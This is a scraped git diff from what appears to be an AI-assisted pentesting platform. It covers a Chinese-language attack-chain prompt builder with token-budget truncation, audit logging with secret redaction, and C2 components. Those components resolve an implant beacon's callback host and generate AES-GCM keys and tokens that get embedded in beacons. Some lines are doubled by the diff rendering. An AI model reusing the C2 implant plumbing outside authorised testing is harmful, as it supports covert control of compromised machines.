builder.WriteString(fmt.Sprintf("[%s] (tool_call_id: %s):\n%s\n\n", role, toolCallID, content))
} else { } else {
builder.WriteString(fmt.Sprintf("[%s]: %s\n\n", role, content)) builder.WriteString(fmt.Sprintf("[%s]: %s\n\n", role, content))
} }
continue continue
} }
// 其他消息类型(system, user等)正常显示
builder.WriteString(fmt.Sprintf("[%s]: %s\n\n", role, content)) builder.WriteString(fmt.Sprintf("[%s]: %s\n\n", role, content))
} }
return builder.String() return builder.String()
} }
// buildSimplePrompt 构建简化的prompt // buildSimplePrompt 构建简化的prompt
func (b *Builder) buildSimplePrompt(reactInput, modelOutput string) string { func (b *Builder) buildSimplePrompt(reactInput, modelOutput string) string {
return fmt.Sprintf(`你是专业的安全测试分析师和攻击链构建专家。你的任务是根据对话记录和工具执行结果,构建一个逻辑清晰、有教育意义的攻击链图,完整展现渗透测试的思维过程和执行路径 return fmt.Sprintf(`你是专业的安全测试分析师和攻击链构建专家。你的任务是根据**当前任务轮次**的对话记录和工具执行结果,一次性输出攻击链 JSON(不要分多轮追问)
## 输入范围(与「继续对话」续跑一致)
- 下方「ReAct 轨迹」仅包含**最后一次用户提问之后**的消息与工具结果(last_react 当前任务轮次),不含更早的用户提问轮次。
- 「助手结论」为同轮任务的最终输出摘要(last_react_output);节点须与轨迹中的实际工具执行一致,严禁编造。
## 核心目标 ## 核心目标
@@ -618,12 +632,9 @@ func (b *Builder) buildSimplePrompt(reactInput, modelOutput string) string {
5. **漏洞确认**:如何确认漏洞存在?(action→vulnerability 5. **漏洞确认**:如何确认漏洞存在?(action→vulnerability
6. **攻击路径**:完整的攻击路径是什么?(从target到vulnerability的路径) 6. **攻击路径**:完整的攻击路径是什么?(从target到vulnerability的路径)
## 最后一轮ReAct输入 ## 当前任务 ReAct 轨迹(含工具执行;助手结论见轨迹末尾 assistant)
%s %s
## 大模型输出
%s %s
## 输出格式 ## 输出格式
@@ -752,7 +763,15 @@ func (b *Builder) buildSimplePrompt(reactInput, modelOutput string) string {
9. **不要过度精简**:如果实际执行步骤较多,可以适当增加节点数量(最多20个),确保不遗漏关键步骤。 9. **不要过度精简**:如果实际执行步骤较多,可以适当增加节点数量(最多20个),确保不遗漏关键步骤。
10. **输出前验证**:在输出JSON前,必须验证所有边都满足source < target的条件,确保DAG结构正确。 10. **输出前验证**:在输出JSON前,必须验证所有边都满足source < target的条件,确保DAG结构正确。
现在开始分析并构建攻击链:`, reactInput, modelOutput) 现在开始分析并构建攻击链:`, reactInput, assistantOutSection(modelOutput))
}
func assistantOutSection(modelOutput string) string {
modelOutput = strings.TrimSpace(modelOutput)
if modelOutput == "" {
return ""
}
return "\n## 助手结论(补充)\n\n" + modelOutput + "\n"
} }
// saveChain 保存攻击链到数据库 // saveChain 保存攻击链到数据库
@@ -811,8 +830,8 @@ func (b *Builder) callAIForChainGeneration(ctx context.Context, prompt string) (
"content": prompt, "content": prompt,
}, },
}, },
"temperature": 0.3, "temperature": 0.3,
"max_tokens": 8000, "max_completion_tokens": attackChainMaxCompletionTokens(b.maxTokens),
} }
var apiResponse struct { var apiResponse struct {
+248
View File
@@ -0,0 +1,248 @@
package attackchain
import (
"strings"
"unicode/utf8"
"go.uber.org/zap"
)
const (
attackChainTruncationMarker = "\n\n...[攻击链输入已截断 / attack chain input truncated]...\n\n"
attackChainSystemReserve = 256
attackChainSafetyReserve = 2048
)
// attackChainMaxCompletionTokens 为攻击链 JSON 输出预留的 completion token 上限。
func attackChainMaxCompletionTokens(maxTotal int) int {
const capTokens = 16384
if maxTotal <= 0 {
return 8192
}
v := maxTotal / 8
if v < 4096 {
v = 4096
}
if v > capTokens {
v = capTokens
}
return v
}
func (b *Builder) modelName() string {
if b.openAIConfig != nil && b.openAIConfig.Model != "" {
return b.openAIConfig.Model
}
return "gpt-4"
}
func (b *Builder) countTokens(text string) int {
if text == "" {
return 0
}
n, err := b.tokenCounter.Count(b.modelName(), text)
if err != nil {
return utf8.RuneCountInString(text) / 4
}
return n
}
// attackChainPayloadTokenBudget 计算 reactInput + modelOutput 可用的 token 预算。
func (b *Builder) attackChainPayloadTokenBudget() int {
maxTotal := b.maxTokens
if maxTotal <= 0 {
maxTotal = 100000
}
templateTok := b.countTokens(b.buildSimplePrompt("", ""))
completion := attackChainMaxCompletionTokens(maxTotal)
reserve := templateTok + attackChainSystemReserve + completion + attackChainSafetyReserve
budget := maxTotal - reserve
minBudget := maxTotal * 35 / 100
if budget < minBudget {
budget = minBudget
}
if budget < 4096 {
budget = 4096
}
return budget
}
// fitAttackChainPayload 在构建最终 prompt 前压缩 ReAct 轨迹与模型输出,避免超出模型上下文。
func (b *Builder) fitAttackChainPayload(reactInput, modelOutput string) (string, string, bool) {
budget := b.attackChainPayloadTokenBudget()
modelBudget := budget * 15 / 100
if modelBudget < 512 {
modelBudget = 512
}
reactBudget := budget - modelBudget
origReactTok := b.countTokens(reactInput)
origModelTok := b.countTokens(modelOutput)
truncated := false
outModel := modelOutput
if origModelTok > modelBudget {
outModel = truncateTextByTokens(b, modelOutput, modelBudget)
truncated = true
}
outReact := reactInput
perToolLimits := []int{12000, 6000, 3000, 1500, 800}
for _, lim := range perToolLimits {
compact := compactFormattedToolBodies(outReact, lim)
if compact != outReact {
outReact = compact
truncated = true
}
if b.countTokens(outReact) <= reactBudget {
break
}
}
if b.countTokens(outReact) > reactBudget {
outReact = truncateTextByTokens(b, outReact, reactBudget)
truncated = true
}
if truncated {
b.logger.Info("攻击链输入已按 token 预算截断",
zap.Int("maxTotalTokens", b.maxTokens),
zap.Int("payloadBudget", budget),
zap.Int("reactBudget", reactBudget),
zap.Int("modelBudget", modelBudget),
zap.Int("reactInputTokensBefore", origReactTok),
zap.Int("reactInputTokensAfter", b.countTokens(outReact)),
zap.Int("modelOutputTokensBefore", origModelTok),
zap.Int("modelOutputTokensAfter", b.countTokens(outModel)),
zap.Int("maxCompletionTokens", attackChainMaxCompletionTokens(b.maxTokens)),
)
}
return outReact, outModel, truncated
}
// compactFormattedToolBodies 缩短格式化 trace 中 [tool] 消息的正文,保留工具头与调用 ID。
func compactFormattedToolBodies(s string, maxRunesPerBody int) string {
if maxRunesPerBody <= 0 || s == "" {
return s
}
const marker = "[tool]"
var out strings.Builder
remaining := s
changed := false
for {
idx := strings.Index(remaining, marker)
if idx < 0 {
out.WriteString(remaining)
break
}
out.WriteString(remaining[:idx])
remaining = remaining[idx:]
nl := strings.IndexByte(remaining, '\n')
if nl < 0 {
out.WriteString(remaining)
break
}
header := remaining[:nl+1]
remaining = remaining[nl+1:]
bodyEnd := strings.Index(remaining, "\n\n[")
var body, rest string
if bodyEnd < 0 {
body = remaining
rest = ""
} else {
body = remaining[:bodyEnd]
rest = remaining[bodyEnd:]
}
if runeLen(body) > maxRunesPerBody {
body = truncateRunesWithNotice(body, maxRunesPerBody)
changed = true
}
out.WriteString(header)
out.WriteString(body)
remaining = rest
if rest == "" {
break
}
}
if !changed {
return s
}
return out.String()
}
func truncateTextByTokens(b *Builder, text string, maxTokens int) string {
if maxTokens <= 0 || text == "" {
return ""
}
if b.countTokens(text) <= maxTokens {
return text
}
markerTok := b.countTokens(attackChainTruncationMarker)
usable := maxTokens - markerTok
if usable < 256 {
usable = maxTokens / 2
}
headBudget := usable * 60 / 100
tailBudget := usable - headBudget
head := takeTokensFromStart(b, text, headBudget)
tail := takeTokensFromEnd(b, text, tailBudget)
return head + attackChainTruncationMarker + tail
}
func takeTokensFromStart(b *Builder, text string, maxTokens int) string {
rs := []rune(text)
if len(rs) == 0 || maxTokens <= 0 {
return ""
}
lo, hi := 0, len(rs)
for lo < hi {
mid := (lo + hi + 1) / 2
if b.countTokens(string(rs[:mid])) <= maxTokens {
lo = mid
} else {
hi = mid - 1
}
}
return string(rs[:lo])
}
func takeTokensFromEnd(b *Builder, text string, maxTokens int) string {
rs := []rune(text)
if len(rs) == 0 || maxTokens <= 0 {
return ""
}
lo, hi := 0, len(rs)
for lo < hi {
mid := (lo + hi) / 2
if b.countTokens(string(rs[mid:])) <= maxTokens {
hi = mid
} else {
lo = mid + 1
}
}
return string(rs[lo:])
}
func truncateRunesWithNotice(s string, maxRunes int) string {
rs := []rune(s)
if len(rs) <= maxRunes {
return s
}
const notice = "\n...[工具输出已截断 / tool output truncated]...\n"
noticeRunes := []rune(notice)
keep := maxRunes - len(noticeRunes)
if keep < 200 {
keep = maxRunes * 2 / 3
}
if keep < 1 {
return notice
}
head := keep * 70 / 100
tail := keep - head
return string(rs[:head]) + notice + string(rs[len(rs)-tail:])
}
func runeLen(s string) int {
return len([]rune(s))
}
+63
View File
@@ -0,0 +1,63 @@
package attackchain
import (
"strings"
"testing"
"cyberstrike-ai/internal/agent"
"cyberstrike-ai/internal/config"
"go.uber.org/zap"
)
func testBuilder(maxTotal int) *Builder {
return &Builder{
logger: zap.NewNop(),
openAIConfig: &config.OpenAIConfig{Model: "gpt-4"},
tokenCounter: agent.NewTikTokenCounter(),
maxTokens: maxTotal,
}
}
func TestCompactFormattedToolBodies(t *testing.T) {
long := strings.Repeat("x", 20000)
in := "[user]: hi\n\n[tool] (tool_call_id: abc):\n" + long + "\n\n[assistant]: done\n"
out := compactFormattedToolBodies(in, 500)
if strings.Contains(out, strings.Repeat("x", 10000)) {
t.Fatal("expected tool body to be truncated")
}
if !strings.Contains(out, "[user]: hi") {
t.Fatal("expected user header preserved")
}
if !strings.Contains(out, "[assistant]: done") {
t.Fatal("expected assistant header preserved")
}
}
func TestFitAttackChainPayloadWithinBudget(t *testing.T) {
b := testBuilder(32000)
react := strings.Repeat("scan ", 50000)
model := strings.Repeat("result ", 10000)
r, m, truncated := b.fitAttackChainPayload(react, model)
if !truncated {
t.Fatal("expected truncation for large payload")
}
prompt := b.buildSimplePrompt(r, m)
total := b.countTokens(prompt) + attackChainMaxCompletionTokens(b.maxTokens) + attackChainSystemReserve
if total > b.maxTokens+attackChainSafetyReserve {
t.Fatalf("prompt still too large: estimated %d > max %d", total, b.maxTokens)
}
_ = m
}
func TestAttackChainMaxCompletionTokens(t *testing.T) {
if got := attackChainMaxCompletionTokens(120000); got != 15000 && got != 16384 {
// 120000/8 = 15000
if got < 4096 || got > 16384 {
t.Fatalf("unexpected completion cap: %d", got)
}
}
if got := attackChainMaxCompletionTokens(0); got != 8192 {
t.Fatalf("expected default 8192, got %d", got)
}
}
+55
View File
@@ -0,0 +1,55 @@
package audit
import (
"strings"
"cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/security"
"github.com/gin-gonic/gin"
)
// RegisterConversationCreateHook records platform audit rows for every new conversation.
func RegisterConversationCreateHook(s *Service) {
if s == nil {
return
}
database.SetConversationCreateHook(func(conv *database.Conversation, meta database.ConversationCreateMeta) {
detail := map[string]interface{}{
"title": conv.Title,
"source": meta.Source,
}
if meta.WebShellConnectionID != "" {
detail["webshell_connection_id"] = meta.WebShellConnectionID
}
s.Record(nil, Entry{
Category: "conversation",
Action: "create",
Result: "success",
Message: "创建对话",
ResourceType: "conversation",
ResourceID: conv.ID,
Detail: detail,
ClientIP: meta.ClientIP,
SessionHint: meta.SessionHint,
})
})
}
// ConversationCreateMeta builds audit metadata for conversation creation.
func ConversationCreateMeta(source string) database.ConversationCreateMeta {
return database.ConversationCreateMeta{Source: strings.TrimSpace(source)}
}
// ConversationCreateMetaFromGin includes client IP and session hint when available.
func ConversationCreateMetaFromGin(c *gin.Context, source string) database.ConversationCreateMeta {
m := ConversationCreateMeta(source)
if c == nil {
return m
}
m.ClientIP = c.ClientIP()
if token := c.GetString(security.ContextAuthTokenKey); token != "" {
m.SessionHint = sessionHint(token)
}
return m
}
+9
View File
@@ -0,0 +1,9 @@
package audit
// RetentionDays returns configured retention; 0 means keep forever.
func (s *Service) RetentionDays() int {
if s == nil || s.cfg == nil {
return 0
}
return s.cfg.Audit.RetentionDaysEffective()
}
+29
View File
@@ -0,0 +1,29 @@
package audit
import "github.com/gin-gonic/gin"
// RecordAction writes a platform audit row with common defaults.
func (s *Service) RecordAction(c *gin.Context, category, action, result, message, resourceType, resourceID string, detail map[string]interface{}) {
if s == nil {
return
}
s.Record(c, Entry{
Category: category,
Action: action,
Result: result,
Message: message,
ResourceType: resourceType,
ResourceID: resourceID,
Detail: detail,
})
}
// RecordOK is a shorthand for successful operations.
func (s *Service) RecordOK(c *gin.Context, category, action, message, resourceType, resourceID string, detail map[string]interface{}) {
s.RecordAction(c, category, action, "success", message, resourceType, resourceID, detail)
}
// RecordFail is a shorthand for failed operations.
func (s *Service) RecordFail(c *gin.Context, category, action, message string, detail map[string]interface{}) {
s.RecordAction(c, category, action, "failure", message, "", "", detail)
}
+86
View File
@@ -0,0 +1,86 @@
package audit
import (
"strings"
"cyberstrike-ai/internal/database"
)
var auditActionsResourceRemoved = map[string]bool{
"delete": true,
"item_delete": true,
"connection_delete": true,
"listener_delete": true,
"session_delete": true,
"task_delete": true,
"execution_delete": true,
"execution_delete_batch": true,
"delete_queue": true,
"delete_batch_task": true,
"markdown_delete": true,
}
// ApplyResourceAvailability sets log.ResourceAvailable when the linked resource can be checked.
func ApplyResourceAvailability(db *database.DB, log *database.AuditLog) {
if log == nil || strings.TrimSpace(log.ResourceID) == "" {
return
}
if auditActionsResourceRemoved[log.Action] {
f := false
log.ResourceAvailable = &f
return
}
if db == nil {
return
}
available, known := resourceStillExists(db, log.ResourceType, log.ResourceID)
if known {
log.ResourceAvailable = &available
}
}
func resourceStillExists(db *database.DB, resourceType, resourceID string) (bool, bool) {
resourceID = strings.TrimSpace(resourceID)
if resourceID == "" {
return false, false
}
t := strings.TrimSpace(resourceType)
if t == "" {
if len(resourceID) > 8 && !strings.HasPrefix(resourceID, "c2_") {
t = "conversation"
} else {
return false, false
}
}
switch t {
case "conversation":
ok, err := db.ConversationExists(resourceID)
return ok, err == nil
case "vulnerability":
_, err := db.GetVulnerability(resourceID)
if err != nil {
return false, strings.Contains(err.Error(), "不存在")
}
return true, true
case "batch_queue":
_, err := db.GetBatchQueue(resourceID)
return err == nil, true
case "c2_listener":
_, err := db.GetC2Listener(resourceID)
return err == nil, true
case "c2_session":
_, err := db.GetC2Session(resourceID)
return err == nil, true
case "c2_task":
_, err := db.GetC2Task(resourceID)
return err == nil, true
case "webshell_connection":
c, err := db.GetWebshellConnection(resourceID)
return err == nil && c != nil, true
case "tool_execution":
_, err := db.GetToolExecution(resourceID)
return err == nil, true
default:
return false, false
}
}
+27
View File
@@ -0,0 +1,27 @@
package audit
import (
"time"
"go.uber.org/zap"
)
// auditRetentionPurgeInterval is how often PurgeExpired runs while the process is up (startup also purges once).
const auditRetentionPurgeInterval = time.Hour
// StartRetentionLoop periodically purges expired audit rows.
func StartRetentionLoop(s *Service, logger *zap.Logger) {
if s == nil {
return
}
go func() {
ticker := time.NewTicker(auditRetentionPurgeInterval)
defer ticker.Stop()
for range ticker.C {
s.PurgeExpired()
if logger != nil {
logger.Debug("audit retention tick completed")
}
}
}()
}
+58
View File
@@ -0,0 +1,58 @@
package audit
import (
"encoding/json"
"strings"
)
var sensitiveKeySubstrings = []string{
"password", "api_key", "apikey", "secret", "token", "authorization",
"credential", "private_key", "access_key",
}
// SanitizeDetail redacts sensitive keys and truncates serialized size.
func SanitizeDetail(detail map[string]interface{}, maxBytes int) map[string]interface{} {
if detail == nil {
return nil
}
if maxBytes <= 0 {
maxBytes = 8192
}
out := sanitizeValue("", detail)
if m, ok := out.(map[string]interface{}); ok {
b, _ := json.Marshal(m)
if len(b) > maxBytes {
return map[string]interface{}{
"_truncated": true,
"_preview": string(b[:maxBytes]),
}
}
return m
}
return map[string]interface{}{"value": out}
}
func sanitizeValue(key string, v interface{}) interface{} {
kl := strings.ToLower(key)
for _, sub := range sensitiveKeySubstrings {
if strings.Contains(kl, sub) {
return "***"
}
}
switch t := v.(type) {
case map[string]interface{}:
m := make(map[string]interface{}, len(t))
for k, val := range t {
m[k] = sanitizeValue(k, val)
}
return m
case []interface{}:
arr := make([]interface{}, len(t))
for i, val := range t {
arr[i] = sanitizeValue(key, val)
}
return arr
default:
return v
}
}
+172
View File
@@ -0,0 +1,172 @@
package audit
import (
"crypto/sha256"
"encoding/hex"
"strings"
"time"
"cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/security"
"github.com/gin-gonic/gin"
"github.com/google/uuid"
"go.uber.org/zap"
)
// Service persists platform audit logs.
type Service struct {
db *database.DB
cfg *config.Config
logger *zap.Logger
failThrottle *failureThrottle
}
// NewService creates an audit service.
func NewService(db *database.DB, cfg *config.Config, logger *zap.Logger) *Service {
return &Service{
db: db,
cfg: cfg,
logger: logger,
failThrottle: newFailureThrottle(),
}
}
// Enabled reports whether audit persistence is on.
func (s *Service) Enabled() bool {
if s == nil || s.cfg == nil {
return false
}
return s.cfg.Audit.EnabledEffective()
}
// Record writes one audit row from a Gin request context.
func (s *Service) Record(c *gin.Context, e Entry) {
if s == nil || !s.Enabled() || s.db == nil {
return
}
if strings.TrimSpace(e.Category) == "" || strings.TrimSpace(e.Action) == "" {
return
}
if e.Result == "failure" && !s.allowFailureAudit(c, e) {
return
}
if strings.TrimSpace(e.Result) == "" {
e.Result = "success"
}
if strings.TrimSpace(e.Level) == "" {
if e.Result == "failure" {
e.Level = "warn"
} else {
e.Level = "info"
}
}
if strings.TrimSpace(e.Actor) == "" {
e.Actor = "admin"
}
maxDetail := s.cfg.Audit.MaxDetailBytesEffective()
detail := SanitizeDetail(e.Detail, maxDetail)
sessionHintVal := e.SessionHint
if sessionHintVal == "" && c != nil {
if token := c.GetString(security.ContextAuthTokenKey); token != "" {
sessionHintVal = sessionHint(token)
}
}
clientIPVal := e.ClientIP
if clientIPVal == "" {
clientIPVal = clientIP(c)
}
row := &database.AuditLog{
ID: "audit_" + strings.ReplaceAll(uuid.New().String(), "-", ""),
CreatedAt: time.Now(),
Level: e.Level,
Category: e.Category,
Action: e.Action,
Result: e.Result,
Actor: e.Actor,
SessionHint: sessionHintVal,
ClientIP: clientIPVal,
UserAgent: userAgent(c),
ResourceType: e.ResourceType,
ResourceID: e.ResourceID,
Message: e.Message,
Detail: detail,
}
if err := s.db.AppendAuditLog(row); err != nil && s.logger != nil {
s.logger.Warn("写入审计日志失败",
zap.String("action", e.Action),
zap.Error(err),
)
}
}
// RecordSystem writes an audit row without HTTP context (e.g. retention cleanup).
func (s *Service) RecordSystem(e Entry) {
s.Record(nil, e)
}
// PurgeExpired deletes rows older than retention_days when configured.
func (s *Service) PurgeExpired() {
if s == nil || s.db == nil || s.cfg == nil {
return
}
days := s.cfg.Audit.RetentionDaysEffective()
if days <= 0 {
return
}
cutoff := time.Now().AddDate(0, 0, -days)
n, err := s.db.DeleteAuditLogsBefore(cutoff)
if err != nil {
if s.logger != nil {
s.logger.Warn("清理过期审计日志失败", zap.Error(err))
}
return
}
if n > 0 && s.logger != nil {
s.logger.Info("已清理过期审计日志", zap.Int64("deleted", n))
}
}
// HintFromToken returns a short stable hash prefix for a session token.
func HintFromToken(token string) string {
return sessionHint(token)
}
func sessionHint(token string) string {
token = strings.TrimSpace(token)
if token == "" {
return ""
}
sum := sha256.Sum256([]byte(token))
return hex.EncodeToString(sum[:4])
}
func (s *Service) allowFailureAudit(c *gin.Context, e Entry) bool {
if !isAuthFailureThrottled(e.Category, e.Action) {
return true
}
cooldown := time.Duration(s.cfg.Audit.AuthFailureCooldownEffective()) * time.Second
key := authFailureThrottleKey(e.Category, e.Action, clientIP(c))
return s.failThrottle.allow(key, cooldown)
}
func clientIP(c *gin.Context) string {
if c == nil {
return ""
}
return c.ClientIP()
}
func userAgent(c *gin.Context) string {
if c == nil {
return ""
}
ua := c.GetHeader("User-Agent")
if len(ua) > 512 {
return ua[:512]
}
return ua
}
+55
View File
@@ -0,0 +1,55 @@
package audit
import (
"sync"
"time"
)
// failureThrottle deduplicates high-frequency failure audit rows (e.g. wrong password).
type failureThrottle struct {
mu sync.Mutex
last map[string]time.Time
}
func newFailureThrottle() *failureThrottle {
return &failureThrottle{last: make(map[string]time.Time)}
}
// allow reports whether a row with the given key may be written now.
func (t *failureThrottle) allow(key string, cooldown time.Duration) bool {
if t == nil || cooldown <= 0 || key == "" {
return true
}
now := time.Now()
t.mu.Lock()
defer t.mu.Unlock()
if prev, ok := t.last[key]; ok && now.Sub(prev) < cooldown {
return false
}
t.last[key] = now
if len(t.last) > 4096 {
for k, ts := range t.last {
if now.Sub(ts) > cooldown*2 {
delete(t.last, k)
}
}
}
return true
}
// authFailureThrottleKey builds a per-IP key for auth failure deduplication.
func authFailureThrottleKey(category, action, clientIP string) string {
return category + ":" + action + ":" + clientIP
}
func isAuthFailureThrottled(category, action string) bool {
if category != "auth" {
return false
}
switch action {
case "login", "change_password":
return true
default:
return false
}
}
+16
View File
@@ -0,0 +1,16 @@
package audit
// Entry describes one platform audit record (not chat/tool execution bodies).
type Entry struct {
Level string
Category string
Action string
Result string // success | failure
Actor string
SessionHint string
ResourceType string
ResourceID string
Message string
Detail map[string]interface{}
ClientIP string // optional when c is nil (robot, batch, DB hook)
}
+39
View File
@@ -0,0 +1,39 @@
package c2
import (
"strings"
"cyberstrike-ai/internal/database"
"go.uber.org/zap"
)
// ResolveBeaconDialHost 决定植入端应连接的主机名(不含端口)。
// 优先级:explicitOverride > 监听器 config_json 中的 callback_host > bind_host0.0.0.0/::/空 时 detectExternalIP,失败则 127.0.0.1)。
func ResolveBeaconDialHost(listener *database.C2Listener, explicitOverride string, logger *zap.Logger, listenerID string) string {
if h := strings.TrimSpace(explicitOverride); h != "" {
return h
}
cfg := &ListenerConfig{}
if listener != nil && listener.ConfigJSON != "" {
_ = parseJSON(listener.ConfigJSON, cfg)
}
if h := strings.TrimSpace(cfg.CallbackHost); h != "" {
return h
}
if listener == nil {
return "127.0.0.1"
}
host := strings.TrimSpace(listener.BindHost)
if host == "0.0.0.0" || host == "" || host == "::" {
host = detectExternalIP()
if host == "" {
if logger != nil {
logger.Warn("listener binds 0.0.0.0 but no external IP detected, falling back to 127.0.0.1; set callback_host or pass explicit host",
zap.String("listener_id", listenerID))
}
return "127.0.0.1"
}
}
return host
}
+154
View File
@@ -0,0 +1,154 @@
package c2
import (
"crypto/aes"
"crypto/cipher"
"crypto/rand"
"encoding/base64"
"errors"
"io"
)
// AES-256-GCM 信封:每个 Listener 独立 32 字节密钥 + 每条消息独立 12 字节 nonce。
// 协议格式(base64 文本,便于 HTTP body / SSE 直接传):
// base64( nonce(12) || ciphertext+tag )
// 设计要点:
// - GCM 自带 16 字节 AEAD tag,完整性 + 机密性一次性搞定,无需额外 HMAC;
// - nonce 由 crypto/rand 生成,96bit 在密钥不变期内重复概率极低(< 2^-32 / 4B 次);
// - 密钥不出服务端:listener 创建时随机生成 32 字节,编译 beacon 时硬编码进去。
// GenerateAESKey 生成随机 32 字节 AES-256 密钥并 base64 输出
func GenerateAESKey() (string, error) {
key := make([]byte, 32)
if _, err := io.ReadFull(rand.Reader, key); err != nil {
return "", err
}
return base64.StdEncoding.EncodeToString(key), nil
}
// GenerateImplantToken 生成 32 字节 tokenbase64 编码(implant 携带在 HTTP header 鉴权用)
func GenerateImplantToken() (string, error) {
t := make([]byte, 32)
if _, err := io.ReadFull(rand.Reader, t); err != nil {
return "", err
}
return base64.RawURLEncoding.EncodeToString(t), nil
}
// EncryptAESGCM 加密任意明文,返回 base64(nonce||ct)
func EncryptAESGCM(keyB64 string, plaintext []byte) (string, error) {
key, err := decodeKey(keyB64)
if err != nil {
return "", err
}
block, err := aes.NewCipher(key)
if err != nil {
return "", err
}
gcm, err := cipher.NewGCM(block)
if err != nil {
return "", err
}
nonce := make([]byte, gcm.NonceSize())
if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
return "", err
}
ct := gcm.Seal(nil, nonce, plaintext, nil)
out := append(nonce, ct...)
return base64.StdEncoding.EncodeToString(out), nil
}
// DecryptAESGCM 解密 base64(nonce||ct),返回明文
func DecryptAESGCM(keyB64, encB64 string) ([]byte, error) {
key, err := decodeKey(keyB64)
if err != nil {
return nil, err
}
raw, err := base64.StdEncoding.DecodeString(encB64)
if err != nil {
return nil, errors.New("ciphertext base64 invalid")
}
block, err := aes.NewCipher(key)
if err != nil {
return nil, err
}
gcm, err := cipher.NewGCM(block)
if err != nil {
return nil, err
}
nonceSize := gcm.NonceSize()
if len(raw) < nonceSize+16 { // 至少 nonce + tag
return nil, errors.New("ciphertext too short")
}
nonce, ct := raw[:nonceSize], raw[nonceSize:]
pt, err := gcm.Open(nil, nonce, ct, nil)
if err != nil {
return nil, errors.New("aead open failed (key mismatch or tampered)")
}
return pt, nil
}
// EncryptAESGCMWithAAD encrypts with additional authenticated data bound to context (e.g. session_id).
// Prevents cross-session replay: ciphertext from session A cannot be fed to session B.
func EncryptAESGCMWithAAD(keyB64 string, plaintext []byte, aad []byte) (string, error) {
key, err := decodeKey(keyB64)
if err != nil {
return "", err
}
block, err := aes.NewCipher(key)
if err != nil {
return "", err
}
gcm, err := cipher.NewGCM(block)
if err != nil {
return "", err
}
nonce := make([]byte, gcm.NonceSize())
if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
return "", err
}
ct := gcm.Seal(nil, nonce, plaintext, aad)
out := append(nonce, ct...)
return base64.StdEncoding.EncodeToString(out), nil
}
// DecryptAESGCMWithAAD decrypts with AAD verification.
func DecryptAESGCMWithAAD(keyB64, encB64 string, aad []byte) ([]byte, error) {
key, err := decodeKey(keyB64)
if err != nil {
return nil, err
}
raw, err := base64.StdEncoding.DecodeString(encB64)
if err != nil {
return nil, errors.New("ciphertext base64 invalid")
}
block, err := aes.NewCipher(key)
if err != nil {
return nil, err
}
gcm, err := cipher.NewGCM(block)
if err != nil {
return nil, err
}
nonceSize := gcm.NonceSize()
if len(raw) < nonceSize+16 {
return nil, errors.New("ciphertext too short")
}
nonce, ct := raw[:nonceSize], raw[nonceSize:]
pt, err := gcm.Open(nil, nonce, ct, aad)
if err != nil {
return nil, errors.New("aead open failed (key mismatch, tampered, or AAD mismatch)")
}
return pt, nil
}
func decodeKey(keyB64 string) ([]byte, error) {
key, err := base64.StdEncoding.DecodeString(keyB64)
if err != nil {
return nil, errors.New("key base64 invalid")
}
if len(key) != 32 {
return nil, errors.New("key must be 32 bytes (AES-256)")
}
return key, nil
}
+144
View File
@@ -0,0 +1,144 @@
package c2
import (
"sync"
"sync/atomic"
"time"
)
// Event 是 EventBus 内部传输的事件单元,是 database.C2Event 的"实时投影"。
// 区别在于:
// - 数据库表保存全部历史,用于审计与列表分页;
// - EventBus 只缓存最近 N 条,用于 SSE/WS 实时推送给在线订阅者。
type Event struct {
ID string `json:"id"`
Level string `json:"level"`
Category string `json:"category"`
SessionID string `json:"sessionId,omitempty"`
TaskID string `json:"taskId,omitempty"`
Message string `json:"message"`
Data map[string]interface{} `json:"data,omitempty"`
CreatedAt time.Time `json:"createdAt"`
}
// EventBus 简单的内存广播总线。
// 设计要点:
// - 多订阅者:每个订阅者有独立 buffered channel,慢消费者不会阻塞 publisher;
// - 容量满即丢弃:发布端绝不阻塞,避免 listener accept loop / beacon handler 卡住;
// - 全局过滤:订阅时可限定 SessionID/Category,前端按需订阅,省 CPU;
// - 关闭安全:Close() 后所有订阅者 chan 关闭,防止 goroutine 泄漏。
type EventBus struct {
mu sync.RWMutex
subscribers map[string]*Subscription
closed bool
}
// Subscription 订阅句柄
type Subscription struct {
ID string
Ch chan *Event
SessionID string // 空表示不限制
Category string // 空表示不限制
Levels map[string]struct{}
dropCount atomic.Int64
}
// NewEventBus 创建总线
func NewEventBus() *EventBus {
return &EventBus{subscribers: make(map[string]*Subscription)}
}
// Subscribe 注册订阅者;返回 Subscription,调用方负责后续 Unsubscribe。
// - bufferSize:单订阅者 channel 容量,建议 64~256
// - sessionFilter / categoryFilter:空字符串=不限;
// - levelFilter[]string{"warn","critical"} 这类,nil/空表示全收。
func (b *EventBus) Subscribe(id string, bufferSize int, sessionFilter, categoryFilter string, levelFilter []string) *Subscription {
if bufferSize <= 0 {
bufferSize = 128
}
sub := &Subscription{
ID: id,
Ch: make(chan *Event, bufferSize),
SessionID: sessionFilter,
Category: categoryFilter,
}
if len(levelFilter) > 0 {
sub.Levels = make(map[string]struct{}, len(levelFilter))
for _, l := range levelFilter {
sub.Levels[l] = struct{}{}
}
}
b.mu.Lock()
defer b.mu.Unlock()
if b.closed {
close(sub.Ch)
return sub
}
b.subscribers[id] = sub
return sub
}
// Unsubscribe 注销订阅者并关闭 channel
func (b *EventBus) Unsubscribe(id string) {
b.mu.Lock()
defer b.mu.Unlock()
if sub, ok := b.subscribers[id]; ok {
delete(b.subscribers, id)
close(sub.Ch)
}
}
// Publish 广播事件给所有订阅者;非阻塞,channel 满时静默丢弃
func (b *EventBus) Publish(e *Event) {
if e == nil {
return
}
b.mu.RLock()
subs := make([]*Subscription, 0, len(b.subscribers))
for _, s := range b.subscribers {
if s.matches(e) {
subs = append(subs, s)
}
}
closed := b.closed
b.mu.RUnlock()
if closed {
return
}
for _, s := range subs {
select {
case s.Ch <- e:
default:
s.dropCount.Add(1)
}
}
}
// Close 关闭总线,停止所有订阅
func (b *EventBus) Close() {
b.mu.Lock()
defer b.mu.Unlock()
if b.closed {
return
}
b.closed = true
for id, s := range b.subscribers {
close(s.Ch)
delete(b.subscribers, id)
}
}
func (s *Subscription) matches(e *Event) bool {
if s.SessionID != "" && e.SessionID != s.SessionID {
return false
}
if s.Category != "" && e.Category != s.Category {
return false
}
if len(s.Levels) > 0 {
if _, ok := s.Levels[e.Level]; !ok {
return false
}
}
return true
}
+29
View File
@@ -0,0 +1,29 @@
package c2
import "context"
type hitlRunCtxKey struct{}
